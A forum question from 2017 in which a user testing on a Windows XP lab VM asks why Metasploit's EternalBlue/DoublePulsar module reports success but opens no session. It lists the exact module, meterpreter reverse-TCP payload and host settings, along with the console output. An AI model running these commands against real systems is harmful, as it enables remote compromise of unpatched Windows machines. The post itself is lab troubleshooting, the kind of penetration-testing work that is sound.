AnsweredAssumed Answered

Metasploit can't stablish connection with hackable target.

Question asked by Gustavo Petruff on May 10, 2017
Latest reply on May 20, 2017 by Null Security

So currently I have a Windows XP VM that I use to test new exploits and stuff.

The machine got it's firewall down so I don't get any kind of trouble when I try to run my pentest.

The only trouble is that since I runned the doublepulsar exploit on a machine already exploited I got the following output:

 

[*] Started reverse TCP handler on 192.168.236.1:4445

[*] 192.168.236.136:445 - Generating Eternalblue XML data

[*] 192.168.236.136:445 - Generating Doublepulsar XML data

[*] 192.168.236.136:445 - Generating payload DLL for Doublepulsar

[*] 192.168.236.136:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll

[*] 192.168.236.136:445 - Launching Eternalblue...

[+] 192.168.236.136:445 - Backdoor is already installed

[*] 192.168.236.136:445 - Launching Doublepulsar...

[+] 192.168.236.136:445 - Remote code executed... 3... 2... 1...

[*] Exploit completed, but no session was created.

 

 

Just to make clear I already have exploited this machine with this exploit.

 

The commands used are:

use exploit/windows/smb/eternalblue_doublepulsar

set payload windows/meterpreter/reverse_tcp 

set RHOST 192.168.236.136

set LHOST 192.168.236.1

 

Other detail is that I tried with ms08_067_netapi and so far no success (the detail is that this exploit works on this VM everytime).

 

Did anyone know a workaround for this issue?

 

Thank you.

Regards.

Outcomes